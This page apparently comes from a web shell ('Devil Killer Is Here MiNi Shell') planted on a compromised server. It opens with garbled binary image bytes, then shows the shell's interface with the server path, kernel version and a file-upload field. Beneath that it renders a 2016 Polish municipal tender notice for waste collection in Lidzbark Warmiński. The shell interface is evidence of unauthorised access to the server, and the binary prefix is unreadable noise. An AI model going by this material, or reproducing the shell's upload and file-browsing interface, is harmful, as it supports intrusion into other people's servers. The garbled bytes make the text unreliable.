JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161207/361440-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://lidzbarkw-um.bip-wm.pl' target='_blank'>http://lidzbarkw-um.bip-wm.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 361440 - 2016
              z dnia 2016-12-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lidzbark Warmiński: Odbiór odpadów komunalnych z terenu Gminy Miejskiej Lidzbark Warmiński wraz z wyposażeniem gniazd w pojemniki i zapewnieniem worków dla określonych nieruchomości oraz utworzenie i prowadzenie Miejskiego Punktu Selektywnego Zbierania Odpadów Komunalnych (MPSZOK) <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miejska Lidzbark Warmiński, krajowy numer identyfikacyjny
              51074350000000, ul.
              ul. A. Świętochowskiego 
              14,
              11100  
              Lidzbark Warmiński, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              897 678 500, e-mail
              zamowienia@lidzbarkwarminski.pl, faks
              897 672 303.
              <br />
              Adres strony internetowej (URL): http://lidzbarkw-um.bip-wm.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://lidzbarkw-um.bip-wm.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://lidzbarkw-um.bip-wm.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferta musi być sporządzona w języku polskim, z zachowaniem formy pisemnej pod rygorem nieważności.<br />
                Adres:
                <br />Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. Aleksandra Świętochowskiego 14, pok. nr 11</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbiór odpadów komunalnych z terenu Gminy Miejskiej Lidzbark Warmiński wraz z wyposażeniem gniazd w pojemniki i zapewnieniem worków dla określonych nieruchomości oraz utworzenie i prowadzenie Miejskiego Punktu Selektywnego Zbierania Odpadów Komunalnych (MPSZOK) <br /><b>Numer referencyjny: </b>GKI.271.20.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest świadczenie usług odbioru odpadów komunalnych z terenu 
    Gminy Miejskiej Lidzbark Warmiński i transportu ww. odpadów do Zakładu Gospodarki 
    Odpadami Komunalnymi Sp. z o.o., z siedzibą w Olsztynie, za pośrednictwem najbliższej 
    lokalizacyjnie stacji przeładunkowej tj. stacji przeładunkowej w Medynach wraz 
    z wyposażeniem gniazd w pojemniki do selektywnej zbiórki odpadów komunalnych                        
    i zapewnieniem worków dla określonych nieruchomości oraz utworzenie i prowadzenie 
    Miejskiego Punktu Selektywnego Zbierania Odpadów Komunalnych (MPSZOK).

2. Cały przedmiot zamówienia został podzielony na 3 następujące zadania:

1)  Zadanie nr 1 -  Odbiór odpadów  komunalnych zmieszanych i selektywnie zbieranych 
     ze wszystkich nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy 
     Miejskiej Lidzbark Warmiński i transport ww. odpadów do stacji przeładunkowej                             
     w Medynach,
2) Zadanie nr 2 - Utworzenie i prowadzenie Miejskiego Punktu Selektywnego Zbierania 
    Odpadów Komunalnych (MPSZOK),
3) Zadanie nr 3 - Wyposażenie gniazd do selektywnej zbiórki odpadów komunalnych 
    w pojemniki do selektywnej zbiórki odpadów komunalnych oraz zapewnienie 
    właścicielom nieruchomości zamieszkałych do 4 lokali oraz właścicielom nieruchomości 
    niezamieszkałych worków do selektywnej zbiórki odpadów komunalnych o poj. 120 l.,

3. Charakterystyka gminy miejskiej Lidzbark Warmiński:
   W Gminie Miejskiej Lidzbark Warmiński na dzień 23.10.2016 r. zameldowanych jest  
   15 898 osób. Według złożonych przez właścicieli nieruchomości zamieszkałych                                   
   i niezamieszkałych deklaracji system gospodarowania odpadami komunalnymi przedstawia 
   się następująco:
1) nieruchomości zamieszkałe:
    a) zbiórka z selekcją: 12 752 osób,
    b) zbiórka bez selekcji: 486 osób,
2) nieruchomości niezamieszkałe (podmioty gospodarcze):
    a) zbiórka z selekcją: 338 podmioty,
    b) zbiórka bez selekcji: 98 podmioty.
			
4. Przewidywana ilość odpadów komunalnych ogółem objętych zamówieniem (w okresie 
    6 m-cy), według szacunku Zamawiającego to około 3 810,63 Mg, w tym:

1) odpady niesegregowane (zmieszane): 3 300 Mg,
2) odpady segregowane (zebrane selektywnie): 510,63 Mg w tym: 
- tworzywa sztuczne, opakowania wielomateriałowe i metal: 100 Mg,
- szkło: 100 Mg,
- makulatura: 100 Mg,
- odpady wielkogabarytowe  75 Mg,
- odpady z betonu i gruzu   25 Mg,
- żużle i popioły  100 Mg,
- elektrozbiórka  10 Mg,
  - przeterminowane leki  0,13 Mg,
  - zużyte opony  0,5 Mg,
  
Wyżej wymieniona ilość odpadów stanowi wielkość orientacyjną, przyjętą dla celu porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy, z którym Zamawiający podpisze umowę, nie przysługuje roszczenie o realizację usługi  w ww. wielkościach. 

5. Zasady odbioru frakcji odpadów zebranych selektywnie:
1) Odbiorowi będą podlegać następujące frakcje odpadów zebranych selektywnie:
- makulatura, 
- tworzywa sztuczne, opakowania wielomateriałowe i metal,
- szkło,
 - żużle i popioły  odbiór z częstotliwością wg potrzeb, 
     -  przeterminowane leki - odbiór z aptek raz na miesiąc, 
     - odpady wielkogabarytowe, zużyty  sprzęt elektryczny i elektroniczny oraz zużyte  opony   odbiór minimum raz na kwartał.

Odbiór przeterminowanych leków z 8 aptek odbywać się będzie zawsze ostatniego roboczego dnia w danym miesiącu i będzie potwierdzony przez upoważnione osoby z każdej apteki.
Wykonawca zobowiązany jest do przedkładania raportów w terminie do 7 dni roboczych po upływie każdego miesiąca, potwierdzających wykonanie odbioru przeterminowanych leków 
z aptek, podpisanych przez osobę upoważnioną przez Wykonawcę oraz przez upoważnioną osobę z apteki wraz z podaniem dnia dokonania odbioru oraz masy odebranych odpadów 
z poszczególnych aptek wg poniższego wzoru:

Lp.	Apteka, nazwa, adres	Data odbioru przeterminowanych leków	Masa leków
(kg)	Potwierdzenie przekazania przeterminowanych leków przez aptekę	Potwierdzenie odbioru przeterminowanych leków przez Wykonawcę

Do raportu Wykonawca dołączy kopie kart przekazania odpadu następnemu uprawnionemu posiadaczowi odpadów potwierdzające przekazanie mu odpowiedzialności za zagospodarowanie odpadów przeterminowanych leków.
W przypadku magazynowania zebranych przeterminowanych leków oraz nieprzekazywania ich w miesięcznych okresach rozliczeniowych następnemu posiadaczowi odpadów, Wykonawca do raportu, dołącza oświadczenie o następującej treści:
 Oświadczam, że w miesiącu      2016  roku, zostało odebranych .. kg odpadów przeterminowanych leków, które zgodnie z posiadaną decyzją z dnia .. Nr wydaną przez   są magazynowane we wskazanym miejscu .
Wykonawca zobowiązuje się do przekazania upoważnionemu pracownikowi Zamawiającego, najdalej wraz z ostatnim raportem, kopii kart przekazania odpadów uprawnionemu posiadaczowi odpadów potwierdzające przekazanie mu odpowiedzialności za przetworzenie wszystkich przeterminowanych leków odebranych przez Wykonawcę.
Wykonawca zobowiązany jest do przekazania odebranych z aptek przeterminowanych leków uprawnionym podmiotom prowadzącym działalność w zakresie przetwarzania tego rodzaju odpadów w procesach unieszkodliwiania. Wykonawca zobowiązany jest do zapewnienia właściwego standardu sanitarnego podczas zbierania przeterminowanych leków, poprzez wyposażenie pojemników w worki z tworzyw sztucznych.
Wykonawca zobowiązany jest do zapewnienia należytej staranności oraz zachowania wysokiego standardu świadczonych usług, w szczególności zapewnienia, aby wykonywane czynności odbioru i gospodarowania odpadów przeterminowanych leków (załadunek, transport, rozładunek i zbieranie) odbywały się zgodnie z przepisami i zasadami gospodarki odpadami, a zwłaszcza zgodnie z:
a) ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21, z późn. zm.),
b) ustawą z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz. U. 
z 2016 r., poz. 1834),
c) ustawą z dnia 27 kwietnia 2001 r.  Prawo ochrony środowiska  (t.j. Dz. U. z 2016 r., 
poz. 672)
d) ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach                      (t.j. Dz. U. z 2016 r., poz. 250 z późn. zm.).
Gmina dopuszcza gromadzenie odebranych z aptek odpadów przeterminowanych leków, wyłącznie w celu zebrania ilości transportowej, w miejscu, w którym Wykonawca może prowadzić działalność w zakresie zbierania tego rodzaju odpadów.
 
 2) Odbiór frakcji odpadów zebranych selektywnie w systemie workowym od mieszkańców                    z terenu Gminy Miejskiej Lidzbark Warmiński, którzy zadeklarowali selektywną zbiórkę odpadów komunalnych, następować będzie według następujących zasad:
   - odpady selektywnie zebrane w workach odbierane będą w tym samym  dniu,      
     co odpady komunalne zmieszane, lecz innym środkiem transportu,
   - wykonawca zobowiązany jest do sprawdzania rzetelności segregacji odpadów.                 W przypadku stwierdzenia nieprawidłowości, wykonawca natychmiast powiadamia Zamawiającego.


3) Odpady zebrane od właścicieli nieruchomości z terenu Gminy Miejskiej Lidzbark 
    Warmiński, Wykonawca zobowiązany jest przekazywać do regionalnej instalacji do 
    przetwarzania odpadów komunalnych w regionie, wskazanej w uchwale Nr IX/228/15 
    Sejmiku Województwa Warmińsko-Mazurskiego z dnia 26 sierpnia 2015 r. zmieniającej 
    uchwałę nr XVIII/334/12 Sejmiku Województwa Warmińsko-Mazurskiego z dnia 19 
    czerwca 2012 r. w sprawie wykonania Planu gospodarki odpadami dla województwa 
    warmińsko-mazurskiego na lata 2011-2016, tj. Zakładowi Gospodarki Odpadami
    Komunalnymi Sp. z o.o., z siedzibą w Olsztynie, któremu została powierzona realizacja
    zadania własnego Gminy w zakresie gospodarki odpadami komunalnymi. Odpady
    komunalne przekazywane będą do ZGOK Sp. z o.o., za pośrednictwem stacji 
    przeładunkowej w Medynach.

Zbiórka i transport odpadów  powinny odbywać się zgodnie z Planem gospodarki odpadami dla województwa warmińsko-mazurskiego, Regulaminem Utrzymania Czystości i Porządku na terenie Gminy Miejskiej Lidzbark Warmiński oraz obowiązującymi przepisami prawa polskiego.

4) Wykaz obsługiwanych nieruchomości zamieszkałych i niezamieszkałych z których
    odbierane będą odpady komunalne, oraz punktów aptecznych, zostanie przekazany 
    Wykonawcy przez Zamawiającego po podpisaniu umowy.

6.  Podstawowa częstotliwość wywozu odpadów wynosi:

A.  Nieruchomości zamieszkałe
  1) odpady komunalne zmieszane:
- dla nieruchomości zamieszkałych do czterech lokali  1 raz na tydzień,
- dla nieruchomości zamieszkałych, znajdujących się na gruntach rolnych  1 raz na   
  dwa tygodnie,
- dla nieruchomości zamieszkałych pozostałych  2 razy na tydzień,

      2) odpady zbierane w sposób selektywny:
- dla nieruchomości zamieszkałych objętych zbiórką odpadów workową - 1 raz na     
  tydzień, 
              - z pojemników tworzących gniazda do selektywnej zbiórki: 
a) makulatura, tworzywa sztuczne, opakowania wielomateriałowe i metale  - 1 raz na  tydzień,
b) szkło - 1 raz na miesiąc, 
   3) odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny oraz zużyte  opony
    1 raz na kwartał.

B. Nieruchomości niezamieszkałe 
1) odpady komunalne zmieszane:
    - dla nieruchomości niezamieszkałych znajdujących się w budynkach wielorodzinnych          i nieposiadających terenu do usytuowania pojemników na odpady   2 razy  na  tydzień,
    - dla nieruchomości niezamieszkałych pozostałych  1 raz na tydzień.

2)  odpady zbierane w sposób selektywny:
- makulatura, szkło  1 raz na miesiąc,
- tworzywa sztuczne, opakowania wielomateriałowe i metale  2 razy na miesiąc.



Uwaga!
1.	W sytuacji zapełnienia pojemników w punktach odbioru zbiorowego, Wykonawca zobowiązany jest do wcześniejszego wywozu odpadów komunalnych. 
2.	Odbiór odpadów komunalnych nie może odbywać się w niedziele i święta. 
W przypadku gdy dzień odbioru odpadów przypada na dzień świąteczny, dniem odbioru odpadów jest pierwszy kolejny dzień nie będący świętem lub niedzielą.
3.	W przypadku stwierdzenia wystawienia przez mieszkańców odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego przy zbiorczych pojemnikach na odpady komunalne lub przy gniazdach do selektywnej zbiórki, Wykonawca zobowiązany jest do odbioru ww. odpadów w dniu stwierdzenia zaistniałej sytuacji.

7. Miejski Punkt Selektywnego Zbierania Odpadów  Komunalnych (MPSZOK).

Do obowiązku Wykonawcy należy utworzenie i prowadzenie ogólnodostępnego Miejskiego Punktu Selektywnego Zbierania Odpadów  Komunalnych (MPSZOK).

1) Wykonawca w celu utworzenie MPSZOK zobowiązany jest do zapewnienia terenu            o powierzchni nie mniejszej niż 500 m2  i uzyskania prawa do władania ww. terenem.
2) MPSZOK zostanie przygotowany do dnia 29.12.2016 roku i udostępniony mieszkańcom Gminy Miejskiej Lidzbark Warmiński od dnia 01.01.2017 roku do dnia 30.06.2017 roku.
3) Do MPSZOK mieszkańcy Gminy Miejskiej Lidzbark Warmiński będą mogli dostarczyć nieodpłatnie następujące frakcje odpadów powstałych na nieruchomościach zamieszkałych:
- odpady z selektywnej zbiórki odpadów (makulatura, tworzywa sztuczne, metale, opakowania  wielomateriałowe, szkło),
-  zużyte urządzenia elektryczne i elektroniczne,
- opony,
- zużyte akumulatory i baterie,
- gruz budowlany do 100 kg/m-c/właściciel,
- odpady biodegradowalne i zielone,
- przeterminowane leki i chemikalia, 
- odpady niebezpieczne: świetlówki, gaśnice, puszki po farbach, aerozole, zużyte oleje, itp.

          4) Wymagania odnośnie MPSZOK:

- lokalizacja na terenie miasta Lidzbark Warmiński, umożliwiająca łatwy i swobodny dostęp dla wszystkich mieszkańców oraz pojazdów dostarczających                           i odbierających odpady,
- magazynowanie selektywnie zebranych odpadów komunalnych w sposób zabezpieczający przed emisją zanieczyszczeń do gruntu oraz przed działaniem czynników atmosferycznych,
- wyposażenie terenu w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych (jeżeli powstają), pochodzących z terenu MPSZOK zgodnie  z przepisami Prawo Wodne,
- wyposażenie w wagę legalizowaną (o obciążeniu od 5 kg do 20 ton),
  - godziny przyjmowania odpadów: w dni robocze w godzinach 8:00 -16:00; w soboty    w  godzinach 10:00  14:00,
- miejsce przyjmowania odpadów powinno być oznakowane (drogowskazy                  z informacją o lokalizacji MPSZOK należy ustawić w miejscu widocznym dla mieszkańców) oraz posiadać tablicę informacyjną z regulaminem MPSZOK, 
- wyposażenie w niezbędną ilość pojemników do selektywnego gromadzenia poszczególnych rodzajów przyjmowanych odpadów, umożliwiającą zebranie wszystkich odpadów.
         
5) Wykonawca zapewni obsługę MPSZOK przez pracowników odpowiedzialnych za
 odbiór, ważenie, umieszczanie odpadów w kontenerach lub pojemnikach, przekazywanie odpadów do unieszkodliwiania lub odzysku, prowadzenie ewidencji odpadów oraz weryfikację osób przekazujących odpady do MPSZOK. 
     Do MPSZOK odpady mogą oddać tylko mieszkańcy Gminy Miejskiej Lidzbark Warmiński.
	  6) Odpady zebrane w MPSZOK będą przekazywane do regionalnej instalacji do 
             przetwarzania odpadów komunalnych w regionie, wskazanej w uchwale Nr 
             IX/228/15 Sejmiku Województwa Warmińsko-Mazurskiego z dnia 26 sierpnia 2015 
             r. zmieniającej uchwałę nr XVIII/334/12 Sejmiku Województwa Warmińsko-
             Mazurskiego z dnia 19 czerwca 2012 r. w sprawie wykonania Planu gospodarki 
             odpadami dla województwa warmińsko-mazurskiego na lata 2011-2016, tj. 
             Zakładowi Gospodarki Odpadami Komunalnymi Sp. z o.o., z siedzibą w Olsztynie, 
             któremu została powierzona realizacja zadania własnego Gminy w zakresie 
             gospodarki odpadami komunalnymi. Odpady komunalne przekazywane będą do 
             ZGOK Sp. z o.o., za pośrednictwem stacji przeładunkowej w Medynach.
7) Wykonawca będzie odpowiadał  za zgodność wszystkich czynności wykonywanych          w ramach działalności MPSZOK z obowiązującym w Polsce prawem  -                                     w szczególności w zakresie bezpieczeństwa i higieny pracy, gospodarki odpadami                   i ochrony środowiska.
8) Wykonawca przyjmuje na siebie wszystkie obowiązki posiadacza odpadów (zgodnie          z ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U z 2013 r., poz. 21, ze zm.),                  a jeżeli będzie transportował odpady niebezpieczne  to również obowiązki przewoźnika, zgodnie z ustawą  z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz. U.  z 2016 r.  poz. 1834).
9) Na prowadzenie działalności w zakresie zbierania odpadów (przewidzianych do zbierania w MPSZOK, określonych w części IV ust. 7 pkt 3 niniejszej SIWZ), Wykonawca musi posiadać, wynikające z ustawy o odpadach, aktualne zezwolenie właściwego organu.
10) Po zakończeniu usługi związanej z prowadzeniem MPSZOK teren nieruchomości należy uporządkować, a zebrane odpady usunąć poprzez unieszkodliwienie lub odzysk.

8. Pojemniki do zbiórki odpadów komunalnych, standard sanitarny wykonywania usług oraz ochrona środowiska.
1) Obowiązkiem Wykonawcy jest dysponowanie wystarczającą liczbą pojemników do gromadzenia zmieszanych odpadów komunalnych dla zapewnienia dzierżawy dla właścicieli nieruchomości nie posiadających ich na własność. 
Obecnie mieszkańcy Lidzbarka Warmińskiego dzierżawią następującą ilość pojemników do gromadzenia zmieszanych odpadów komunalnych:
- SM 1,1 m3  254 szt.,
- KP 7m3 - 61 szt.,
              Ww. ilość pojemników nie jest ostateczna i może ulec zmianie o ok.  10%.
         2) Podstawowymi typami pojemników do zbierania zmieszanych odpadów komunalnych  są: 
- pojemniki KP-7 o pojemności 7000 l oraz pojemniki 1100 litrowe dla
  nieruchomości zamieszkałych wielorodzinnych i nieruchomości
  niezamieszkałych,
- pojemniki 110 l i 120 l dla nieruchomości jednorodzinnych,
3) Obowiązkiem Wykonawcy jest wyposażenie gniazd do selektywnej zbiórki  odpadów  komunalnych w pojemniki do selektywnej zbiórki odpadów komunalnych i uzyskanie prawa do dysponowania gruntem na ten cel. Pojemniki powinny być estetyczne  i ustawione na utwardzonym podłożu. 
Miejsca ustawienia pojemników, ich rodzaj i ilość określono w załączniku nr 9 do niniejszej SIWZ. Ww. ilość pojemników nie jest ostateczna i może ulec zmianie      o ok.  10%.
4) Wykonawca zobowiązany jest do pozostawienia miejsc po odbiorze odpadów komunalnych w należytej czystości (wymagane jest sprzątanie po zabranych workach lub opróżnieniu pojemników). 
5) Pojemniki będące własnością Wykonawcy powinny być poddawane myciu    stosownie do stopnia ich zanieczyszczenia i nie rzadziej niż raz na pół roku.

9. Worki do selektywnej zbiórki odpadów komunalnych.
    Wykonawca zobowiązany jest do zapewnienia worków do selektywnej zbiórki odpadów 
komunalnych o poj. 120 l, do tego celu przeznaczonych o odpowiedniej wytrzymałości, zapewniającej bezpieczny z punktu widzenia technicznego i sanitarnego transport oraz ich odbieranie z nieruchomości, w ilościach określonych w załączniku nr 2 do SIWZ. Worki muszą być wyposażone w taśmę ściągającą lub w taśmę do wiązania.  

